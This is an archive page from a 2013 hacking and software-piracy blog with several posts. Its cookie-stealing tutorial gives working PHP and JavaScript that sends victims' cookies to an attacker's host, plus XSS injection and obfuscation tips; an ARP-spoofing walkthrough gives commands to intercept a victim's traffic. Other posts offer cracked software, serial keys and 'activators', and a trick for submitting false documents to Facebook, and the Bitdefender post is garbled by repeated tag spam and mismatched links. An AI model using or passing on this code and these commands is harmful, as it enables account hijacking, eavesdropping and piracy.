Thursday, October 31, 2013

IDM v6.18 Built 5 Full Version Free Download

Internet Download Manager(IDM) v6.18 Built 5 Full Version Free Download (Patch file/Serial key) |100% Working Mediafire|
Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Version 6.18 adds Windows 8 compatibility, adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE 10 and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.


Also Read: Best Ebooks To learn Hacking

What's new in version 6.18 Build 5

(Released: Oct 29, 2013)
  • Added support for Firefox 26 and SeaMonkey 2.21
  • Fixed a bug when assembling video files with high bitrate
  • Improved video recognition in Google Chrome
If you have an older version installed or a version that’s no longer registered/trial finished I suggest you to un-install it and then install this.
Also Read:Best ways to Boost up your Internet Speed

                                    Download Trial Version from Below link
Download     

Download Patch file From Below link
Download 

Password is >>>    www.darkhtu.net
 Tags:IDM latest version free download with key,IDM v6.18 Crack file,IDM v6.18 serial key,IDM v6.18 Built 5 full version free download,internet download manager full version key working this November,Best downloader,How to download Youtube and facebook videos,latest softwares keys for free download,Internet download manager v6.18 Built 1,2,3,4,5 keys for making full version..

Man In The Middle Attack Using Kali Linux



I. Man in the middle - Concept

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.


Also Read: Full Concept of Man in the Middle Attack

 
II. Scenario.

We will use this IP's:

Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8


III. Requirements:

1. Arpspoof
2. Driftnet
3. Urlsnarf




Also read:Best Hacker OS Free Download
 
IV. Step by step: Kali Linux Man in the Middle Attack.


1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. If you don't know how to set up packet forwarding in linux - let me know in the comment

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router:

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim:

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. To do this we will base on this website:
http://www.ex-parrot.com/~chris/driftnet/

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this:

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code:

urlsnarf -i eth0

...and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.








Also read:How to Hack Wifi For Free?


V. Conclusion:

Hope you enjoyed! Remember - this article is only for educational purposes.

--
Driftnet or Urlsnarf is hard to detect, but you can try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.

Wednesday, October 30, 2013

The Top 10 Most Wanted Hackers of all time

Who among us has not been victimized by a virus? Not the virus that can make a person sick, but the kind that can cripple your computer, or worse, the entire network you are on. The culprits are those amazingly talented people who possess the ability to come up with programs to break into other people’s gadgets. Sometimes, they do it just for the heck of it and annoy the hell out of us. Other times, they use it to steal valuable information.
The Top 10 Most Infamous Hackers of All Time
Regardless of their reasons, here is a list of the top 10 most infamous hackers of all time.

10. Loyd Blankenship

10
Loyd Blankenship does not have a hack that can be solely attributed to him. He was a member of the Legion of Doom, however, that rivaled the Masters of Deception, or MoD, during the late 80′s. Known as The Mentor, his claim to fame is authorship of The Hacker Manifesto, which he wrote after his 1986 arrest. It defended hackers, claiming that they only do it to satisfy their curiosity.

9. Stephen Wozniak

 9
The co-founder of Apple started out as a hacker. While studying at the University of California, Berkeley, he bypassed the phone system by phreaking. This allowed him to make free long distance calls. He even used it to call world leaders like the Pope. Not long after, he started working with Steve Jobs to create Apple Computer.

8. The Masters of Deception

8
During the 1980′s, a group of hackers banded together to form the Legion of Doom. It aimed to break in to the networks of giant corporations and simply wreak havoc in it. Later on, some members of the group decided to form and spin off a rival new group. They were all based in New York and they called themselves the Masters of Deception, or MoD. The group’s most famous victim was AT&T, whose system was broken through by MoD, allowing them to hack to the company’s vast phone network. It was only in 1992 that the group got busted, with its members going to jail or receiving suspended sentences.

7. Adrian Lamo

7
Adrian Lamo was a mobile hacker who launched his work from the confines of Internet cafes, libraries or coffee shops. He actually did it just as a challenge and for fun, as he would regularly break into computer systems and then immediately tell the owner of the network about its vulnerability. He even made himself an expert by adding his name to the database of the New York Times. He was arrested in 2003. He was also the one who turned in Bradley Manning, who had leaked government documents to Wikileaks.

6. Sven Jaschan

6
In 2004, the wired world was bothered by a series of worms that eventually became known as Netsky and Sasser. It spread so quickly that in just a short while, the worms accounted for as much as 70 percent of all the malware spreading at that time over the Internet. Amazingly, the offender was only a mere teenager. His name was Sven Jaschan and he was arrested and tried in court. Owing to the fact that he was still just a teenager, he only got a suspended sentence, though the judge ordered him to report to a probation officer regularly for the next three years. Still, talent like that is hard to find, so despite his criminal background, he was immediately hired by a security company to help come up with antidotes to computer viruses.

5. David L. Smith

5
Back in the nascent days of the Internet, usenet was all the rage. Just like the beginning of time until now, sex was one of the more popular topics. David L. Smith took advantage of this to spread the highly notorious Melissa worm virus. The original form was distributed by email, making it the first malware to be successfully transported through this method. Experts estimate that the virus caused as much as $80 million in damages. Smith was later arrested and sentenced to jail.

4. Michael Calce

4
He was only 15 years old and was probably pining for a girlfriend like a typical teenager, but Michael Calce was able to cause the temporary shutdown of sites like Yahoo, Amazon and eBay. Using the name of MafiaBoy, Calce hacked to the large commercial sites that led to denial-of-service attacks across 75 computers in 52 networks. He might have gotten away with it if he did not boast about his feat in an online chat room. He was sentenced to eight months of open custody, a year of probation and a small fine. He was also restricted from using the Internet.

3. Robert Tappan Morris

3
In 1988, a graduate student from Cornell University who also had a bachelor’s degree from Harvard University, decided to make use of his Ivy League education to test the size of the Internet. He did it by creating the Morris worm. The worm ended up affecting 6,000 major Unix machines, practically shutting them down and causing millions of dollars in damage. It was probably the first worm of its kind. Morris was eventually caught, fined, sentenced to a three-year probation, and ordered to conduct community service. The disk that he used to write the worm is now on display at the Boston Museum of Science. Morris himself is now a professor at the Massachusetts Institute of Technology.

2. Kevin Poulsen

2
Kevin Poulsen started out with an amusing hack into the phone lines of a radio station that allowed him to be the 102nd caller, which made him win a Porsche. He also broke into the phone system to reactivate old numbers. Poulsen was able to hack into the federal investigation database. After he was featured on the TV show Unsolved Mysteries, the numbers posted for information leading to his arrest mysteriously crashed. He has since been imprisoned and released. He is now a Senior Editor for Wired News.

1. Kevin Mitnick

1
Kevin Mitnick does not like being called a hacker. He instead claims to be a social engineer, who has broken into the systems of Nokia, Fujitsu and Motorola. He was arrested in 1995 and served five years in jail. He now runs his own computer security consultancy company.

Tuesday, October 29, 2013

How to get maximum discount on buying stuffs online for free?

In marketing, a coupon is a ticket or document that can be exchanged for a financial discount or rebate when purchasing a product.A coupon code is a code, consisting of letters or numbers that consumers can enter into a promotional box on a site's shopping cart checkout page to obtain a discount on their purchase, such as a percentage off purchase, free shipping, or other discount.

In this trick,I'll be telling  you guys on how to get coupon codes of any sites and get maximum discounts.This tricks works on almost maximum sites.Now,no need to search in Google for coupon codes.Using this trick,you can easily get coupon codes of required and no Google help is needed.So,lets start this trick....

Let me introduce about Promo-fly....
 promofly
Promofly is a free-to-use bookmarklet for Firefox, Chrome, Safari, and IE (10+) that helps you find promo codes quickly and easily. There are several ways to use Promofly, depending on what you’re trying to find.

The first way to use Promofly is to find discounts for product you’ve already chosen. For example, you can click the Promofly bookmarklet when your shopping bag is already full, and Promofly can help you make sure you’re not missing any codes, and if there are, to quickly apply them to your purchase.
promofly-2
Alternatively, you can check Promofly first thing when you load the store’s website. If there are any promo codes available for that store, Promofly will show them to you, helping you decide what and if you want to buy. The third way to use Promofly is to explore is by category using the Explore tab. There’s also a search function, but it only works for store names, so it’s not very effective with stores that have non-descriptive names.
promofly[4]

Promofly claims to include over 5,000 stores, but if you happen upon a store that’s not in the database, you can now add it yourself, thus helping to improve the overall Promofly experience.
promofly-9

With that said, Promofly is an excellent service that offers something no one else currently does. Not only does it make coupon-finding an easy task, it also helps you save money by finding related available discounts, and sorting them so you see the most valuable ones first. Even if it doesn’t perform 100% of the time, it’s still very reliable, and since there’s nothing to install but a simple bookmarklet, it’s not going to impact your browser performance in any way.
In short, if you do any amount of online shopping, give Promofly a try. You won’t be sorry. 
Check out this video on how to install Promofly in your browsers...

Saturday, October 26, 2013

Cookie Stealing Tutorial

A cookie stealer is used to steal the login information of any unsuspecting victim. Once the link is visited, the cookie of the user is taken and stored in a text file. They are then redirected to another page without knowing what has just happened. This cookie stealer will be made using PHP, so to begin with you will need a free host with PHP support. There are many out there so I wont give any examples. Once you have your host it's time to begin.



A cookie stealer is made up of a sender and a receiver. The sender is done using JavaScript so will work on almost any site providing the user has JavaScript turned on. The receiver is placed on your site and takes the cookie from the JavaScript cookie sender. Here is the receiver code for your PHP file:



<?php

$cookie = $HTTP_GET_VARS["
c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";

?>


There are 3 parts of this code that are highlighted. 
The first is the letter "c", this is the name of get command the PHP file uses to get the cookie (/script.php?c=...) If you are trying to hide what the script is doing, this can be called anything. If you change this though, the script below must be changed to fit.
The second and third are the name of the log file it creates when the cookie is received and where it redirects the user to after the log file has been stored.

Next is the Javascript receiver:



<script language="JavaScript">
document.location= "
http://www.yoursite.com/stealer.php?c=" + document.cookie; </script>


Again you have to change the URL to fit the actual location and name of your PHP script. Also, if you have changed the GET variable name (c) this must be changed too.

Add that to the site and as soon as it loads, the cookie is stolen. It would be a lot better to name the PHP page to look like part of the site your are infecting e.g. out.php maybe. That's all there is to building a basic cookie stealer. If you want to go more advanced and have a host with sendmail enabled you could make the script email you the cookie log as soon as it arrives.

How cookie stealers are used?




Just before finishing this tutorial it would useful to mention the most common infection methods. The first is finding a post comment form or guestbook or any web form that doesn't filter what the user enters, allowing you to enter the above JavaScript into the comment field. This is a relatively simple method.

Then there is also posting the link on basic forums that allow you to do so making sure the link is hidden or submitting the link to a site.

The next is through XSS . permanent XSS is easy its just the same again, but temporary XSS can be used as well. Say you have a search engine that is vulnerable and the format is:

Search.php?q=search_here 
 


You could add the script straight to it


Search.php?q=<script language="JavaScript">document.location= "http://www.yoursite.com/stealer.php?c=" + document.cookie;</script>
 
Although this does look pretty obvious. Possibly making use of encrypting using hex then using Javascript's document.write or using unescape will make it virtually unrecognisable though.



Links

http://www.nickciske.com/tools/hex.php

Hex encoder/decoder

http://www.java2s.com/Code/JavaScript/Security/UnescapeEncoderDecode.htm




JavaScript unescape encoder/decoder

And that's all there is to this tutorial. Now you should also be able to recognize,create and avoid a cookie stealer if one is directed towards you....

Dark Shadow Official Forum Launched | Don't forget to join |


http://www.pennyauctionwatch.com/wp-content/uploads/2010/04/people.jpg
Hello Guys,I'm here in this post to introduce with you all to show you the message of establishment of D@rk Sh@dow official Forum...Yes,There forum is launched officially launched...Here I'll provide you the link of the forum and short introduction of Dark Shadow ...


Who are Dark Shadow groups?

They are a group who are spreading over the Internet users like HIV Virus..Actually they are a group dedicated to teach Ethical Hacking to the Internet Users who are always curious to learn new tricks..They provide their services for free.If you wanna learn new tricks and join them,we recommend you to join the official Group of Dark shadow,click here to join...


 Dark shadow Team Admins

Ok,let me introduce with you all guys the admins of this group..

1)Invictus Rampage Kevin,: Expert Black Hat Hacker,Have good knowledge on Programming,love to teach about Website Hacking,blogging,PC tricks,provide latest Hacking tricks,Currently Running more than 5 Hacking sites and posting his articles in this blog....

2)Sting :Linux developer,Programmer,Web hacker,Best known for coding and designing websites,provides latest hacking tools,Have good knowledge on HTML,php,Java and CSS..

3)LayaVhi Iskander:Best known for his designing,have very good knowledge in PC hacking,Very Helpful,always curious to teach how to use latest softwares,3D & 4D image designer,Have good knowledge on HTML and Java..

4)Ajay Verma: A professional web hacker,have a good knowledge on facebook hacking,provides latest cyber news,always curios to provide security tips and helps everyone in every sectors,knows Java and provides Mobile tricks...


Why they created the forum?

Well,As you know they are always curious to teach latest news on Cyber hacks and ethical hacking,they are trying their best to provide from their Facebook group but they got many problems;

>They always got many posts which might be same but they have to teach every time which takes a bit time..

>While teaching one other might not see,so it won't be helpful to many others..

>As they are growing rapidly,they have to give moretime on facebook group which might be little boring,
so they created forum so as to teach every one at once in less time..In forum,they will post a topic and many can discuss on it...

I don't want to take more time of yours,Click below link to join their Forum..



 
http://www.darkshadow.pw/



Friday, October 25, 2013

Best Password Hacking Breaking Tools 2013 Link Updated

Hello Friends , Today I am sharing with you my latest Collection of "Best Password Hacking Tools 2013". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will like this post.



best hacking tools, password crackers, password hacking softwares


This Password Hacking Kit Consists of following Password Hacking Breaking Tools:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker.
4. SQL Password Remover
5. Microsoft Office Password Remover.
6. Microsoft Windows Vista Password Remover.
7. Rar File Password Cracker
8. Windows Password Recovery Kit
9. Password Changer.
10. Distributed File Password Recovery..
and much more..

As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools ..

How to Use it??
 
1. Download the Password Hacking Kit From Below:

2. Extract the file and Install it.

3. Then Register them and use it. ( all tools contains Full serial keys and patches).


Hope it helps you a lot...

Change Name of Facebook Fan Page After 200+ Likes


change facebook page name

Hello Guys,Its Kevin...I was little busy in creating a forum so couldn't post on our website..And I'm back with this trick which will be very helpful to all the users.....
 
As you might have Facebook pages which have crossed 200+ Likes..but you want to change the name of the page..To change the name there's a problem,Facebook don't allow to change the name for the pages having 200+ Likes...But in this post you will learn how to change the name of fan-page having many likes....

How To Change Your Page Name After 200 Likes ?


Now the main question if it not possible to change name after 200 likes then i how it will be possible. Don't worry about that few weeks back have change name of page with 7k+ likes and then merge that page in another similar one.
Facebook introduce a new features about Request them to change name but this feature is still available in few countries only like US, Canada may be in beta testing. If you are in that countries and just wait for months to get option in your place but i don't feel that as good part. We should have to make effort instead of waiting. So if you want to know about how this method works then follow below steps carefully.

Steps For Changing Name

  • Firstly you have to install Firefox Add-ons your browser to install Click here
  • For other Browsers Add any US server proxies in your Browsers IP address settings.
  • For Firefox users after installing add-ons. New Icon will appear on your browser simply click on them and mark as Active.
firefox anonymox add-ons
  • After activating Add-ons, Log In your Facebook account
  • Then Open that page whose name you want to change. Go to Admin Panel >> Edit Page >> Update Page Info.
  • Now in Catagory Option change them into local business.
facebook change category
  • After changing category click on Edit Page Name Button.
  • Then you will see the option of Request to Change Name.
 facebook request change name
  • Click on that option and new form will appears about Change Name Request.
  • Tick the button for accepting the page guidelines of Facebook. 
  • Then select the type from the menu about your page currently representing.
 facebook change name form
  • Then tick on the button that you still want to change the name of page.
  • Add Accurate information in all the fields like Current Page Name, Desired Page Name which you want.
  • Select the accurate reason why you want to change Page name from menu. 
  • Upload any document which represent that your business is changes, or you page is misspell of your business. Always upload document based on the reasons you have selecting in previous step.
facebook change name form
  • Then tick both option for proceeding request and click on send button.
After requesting change name you will receive email in your email account associate with Facebook account from where you request change name. This email may take 3-7 days about reponse back on your request. If your request will get accept then your page name will be change automatically to the name which we added in desired name.

Tricky Part:- Suppose if you don't have any document or you just want to change name of your any fans page simply select the category Misspell and upload your cover image :D This method is also working.. lol

Reasons For Not Changing Name After Requesting

This Change name request only works if you have accurate and right reason. For business pages you have to upload document which clears about changing or re-branding Page name with solid reasons.

But you have just fans page and selecting misspell option is right choice.

Facebook change names only if new name is little bit similar to previous one. For Example My Page name is "I am Pahul Singh" then after requesting i can change them into "I am Pahul" ,  "Pahul Singh"
but if you choose only "Pahul" less chance need solid documents or "I am Singh" which may be not right choice.

This feature need your luck. I don't feel any particluar need for changing. I have request for change with documents but facebook reject and for another page i upload cover pic and choose almost different name and facebook accepts. :P I don't know what facebook want its may be your luck works.
 
 
Thanks to my friend blog for giving this post:)

Sunday, October 20, 2013

What is Reverse Engineering? |A complete Intorduction|



Today we will discuss what is reverse engineering? How its useful for ethical hacks? Common terms used in reverse engineering. In next post i will share the best reverse engineering software’s and tools that i normally use to reverse engineer any program, software or windows file. So friends, lets start our hacking class of reverse engineering.
  
mevade-code

What is Reverse Engineering?
Have you ever noticed, Nokia or Iphone made an application and after few days you find that on Samsung or any other mobile device. Its nothing that difficult, its called reverse engineering. They decode their programs to get the basic structure of the original program and then following the structure codes their own and sometimes doesn’t even happen just make some code changes and uses them.
According to Wikipedia “Reverse engineering is the process of discovering the technological principles of a device, object or system through analysis of its structure, function and operation. It often involves taking something (e.g., a mechanical device, electronic component, biological, chemical or organic matter or software program) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original”.

Ahh.. more technology related. I will explain you in better way. As the name suggest reverse engineer means if have something already made, in computer field say exe installer file. Now what reverse engineering is, decoding the exe in such as fashion that we will get original source code or some what near to it. Consider an example, you have a wall made of bricks, here bricks are base material to build the wall. Now what we want to do is we want to obtain all the bricks from the wall. Similarly we have an executable or dll file and we know programs are made from coding only, so source codes are base material in building executable. So we want to obtain the source code from the executable or some what near to it. As when you break wall also to get the bricks some bricks are also got broken and that’s all depend type of material used to fix or mend bricks to make the wall. Similarly the retrieval of source code from executable depends upon how securely software is being packed and type of cryptography or packer is used by its designer.

I hope now you have got what exactly reverse engineering is…

What is the use or benefit of Reverse Engineering?
I can guarantee most of internet users use cracks or keygens or patches. Have you ever tried to understand how they are made. Ahhh… I know you haven’t. So let me give you clear information. All the keygens or cracks or patches of software’s are made by technique called Reverse Engineering. Oops… I was going to tell the benefits.. what i am telling…negative features… But these are features of reverse engineering my friends and most commonly used by all famous organizations as its a part of their Program promoting methodolgy.


Other Beneficial Uses of Reverse Engineering:

  • Product analysis: To examine how a  product works
  • Removal of copy protection, circumvention of access restrictions.
  • Security auditing.
  • Extremely useful when you lost documentation.
  • Academic/learning purposes.
  • Competitive technical intelligence (understand what your competitor is actually doing, versus what they say they are doing).
  • Last but not the least..Learning: learn from others’ mistakes. Do not make the same mistakes that others have already made and subsequently corrected.

    Common Terms Used in Reverse Engineering:
    1. Debugger
    2. Deassembler
    3. Decompiler
    4. Packers or Unpackers
    5. Program Obfuscation
    6. Hex Editing
    7. Cryptography

    I will explain these terms in detail in my next article. Till then you can explore these topics on internet so that you will have some prior knowledge of Reverse Engineering terms.

    Note: Reverse Engineering articles will going to be more advanced and technology oriented which surely requires prior knowledge of Assembly language specially registers and accumulators and several reverse engineering commands like JMP, DCL etc..

    Saturday, October 19, 2013

    Simple Way to Install Backtrack in an andriod device

    Hello guys, today I'm going to show you the easiest way to install backtrack on an android device.


    For this tutorial you need: 
    > Rooted android device 
    > Linux installer (Can be found on Google play) 
    > Zarchiver (Can be found on Google play) 
    > Busybox (Can be found on Google play) 
    > Android-VNC (Can be found on Google play) 
    > Terminal Emulator (Can be found on Google play) 

    All of the programs mentioned above are free. Ok, now let's start, The first thing you need to do is install Busybox from Google play:-









    Install it, then open it when it's done, it will install some more things. When it's done, install Linux Installer from Google Play:-



    Open Linux installer, then click on Install Guides from the list on your right hand side.




    When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this...



    Just click on "Download Image", and let it finish downloading. While it's downloading, open Google play and install Terminal Emulator, and Zarchiver...

    Terminal Emulator.



    Zarchiver.




    When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called "backtrack", extract the image into an external memory card not the internal one. Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this...



    If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted. When it finally say "backtrack" on the drop down list, click "Start Linux" Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture below..




    You are now in backtrack! Now if you want backtrack in GUI, open Google play, and install Android VNC:




    Open It when it finishes installing, and it will look like this..




    Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal, in terminal emulator, and running "ifconfig" command:..



    Settings for VNC are,
    Username: backtrack 
    Password: backtrac
     IP: from the "ifconfig" command or just put 127.0.0.1 
    Color Format: 24-bit 

    Now click connect, and boom! You'r in backtrack Desktop! ;)




    When you finish using it, remember to disconnect VNC AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background.-



    And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change.

     That's it guys, enjoy! :)

    Tags: Andriod hacks,wifi hacker for andriod,backtrack for andriod,Andriod new tricks 2013,Andriod backtrack,How to hack wifi in using andriod devices,andriod geeks,How to install backtrack on andriod devices for free easily,How to hack wifi easily in andriod...
    How To Install Backtrack In An Android Device - The Easiest Way Share On Google+Add This To DeliciousTweet/ReTweet ThisShare on FacebookStumbleUpon ThisDigg This Related Posts Plugin for WordPress, Blogger... Hello guys, today I'm going to show you the easiest way to install backtrack on an android device. For this tutorial you need: Rooted android device Linux installer (Can be found on Google play) Zarchiver (Can be found on Google play) Busybox (Can be found on Google play) Android-VNC (Can be found on Google play) Terminal Emulator (Can be found on Google play) All of the programs mentioned above are free. Ok, now let's start, The first thing you need to do is install Busybox from Google play: Install it, then open it when it's done, it will install some more things. When it's done, install Linux Installer from Google Play: Open Linux installer, then click on Install Guides from the list on your right hand side: When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this: Just click on "Download Image", and let it finish downloading. While it's downloading, open Google play and install Terminal Emulator, and Zarchiver. Terminal Emulator: Zarchiver: When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called "backtrack", extract the image into an external memory card not the internal one. Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this: If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted. When it finally say "backtrack" on the drop down list, click "Start Linux" Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow: You are now in backtrack! Now if you want backtrack in GUI, open Google play, and install Android VNC: Open It when it finishes installing, and it will look like this: Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal, in terminal emulator, and running "ifconfig" command: Settings for VNC are, Username: backtrack Password: backtrac IP: from the "ifconfig" command or just put 127.0.0.1 Color Format: 24-bit Now click connect, and boom! You'r in backtrack Desktop! ;) When you finis using it, remember to disconnect VNC AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background. And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change. That's it guys, enjoy! :)
    - Read more at: http://www.securitygeeks.net/2013/03/how-to-install-backtrack-in-android.html

    Thursday, October 17, 2013

    Bit defender total Security 2013 Serial Keys + Permanent Activator upto 2075 | No surveys |

     Guys,previously we have posted bit defender total security keys,check here but we got some complained that the keys are getting trial after updating.So,this post is dedicated to all Bit defender users.All details in download file.I've tested this keys and permanent activators and they work perfect.No trial after updating too.Got keys upto 2075 for free free....So,Enjoy and please comment and let us know if it works for you or not....
     bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
     bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
     bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
     bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
    bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks,Hacks,New hacking tricks,Antivirus cracks,total security crack.. - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
    bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks,Hacks,New hacking tricks,Antivirus cracks,total security crack.. - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
    About Bit Defender Total Security 2013
    Antivirus Plus 2014Bitdefender Total Security 2013 builds on #1 ranked anti-malware technology to secure online transactions, protect mobile devices from loss/theft, automatically back up files, and Tune-Up PCs.
    Bitdefender Total Security is the acknowledged Antivirus of the Year. With a non-intrusive and extremely fast scanning technology, it offers the ultimate silent security against e-threats.
    • Ultimate anti-malware defense for your data
    • Extremely fast. Non-intrusive. With Bitdefender Photon™
    • Guards your online transactions. Protects your digital identity.
    • Reveals your kids’ online activities. Restricts them when necessary.
    • Safely stores your information online and syncs it between devices
    • Safeguards laptops and netbooks in case of loss or theft
     
    Specifications: 

    Minimum requirements:
     Operating system: Microsoft Windows XP SP3 (32 bit) , Vista (SP2), Microsoft Windows 7 (SP1), Microsoft Windows 8
    CPU: 800MHz processor
    Memory (RAM): 1 GB
    Available free hard disk space: 1.8 GB free space (at least 800 MB on the system drive)

    Recommended system requirements:
    Operating system: Microsoft Windows XP SP3 (32 bit), Vista (SP2), Microsoft Windows 7 (SP1), Microsoft Windows 8
    CPU: Intel CORE Duo (1.66 GHz) or equivalent processor
    Memory (RAM):
    1 GB (Microsoft Windows XP)
    1.5 GB (Microsoft Windows Vista, Microsoft Windows 7 and Microsoft Windows 8)
    Available free hard disk space: 2.8 GB free space (at least 800 MB on system drive)

    Software requirements:
    Internet Explorer 7 and higher
    .NET Framework 3.5 (automatically installed by Bitdefender if necessary)

    Supports/Integrates with:
    Firefox 3.6 and higher
    Thunderbird 3.0.4
    Outlook 2007, 2010
    Outlook Express and Windows Mail on x86

     Also Visit Working Bit Defender Total Security 2013 License keys upto 2045

    Download Latest Keys from here,

    http://www.matriux.com/index.php?page=download

    Below To download
    http://www.matriux.com/index.php?page=download
    - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf

    http://www.matriux.com/index.php?page=download


    Also Check this Video........ - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf
    Download Permanent Activator From here,

    http://www.matriux.com/index.php?page=download

    bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks,Hacks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf

    Password is     ultimatehacker4400

    Thanks for visiting our website and please comment if it works or not.........

    bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks,Hacks,New hacking tricks,Antivirus cracks,total security crack.. - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
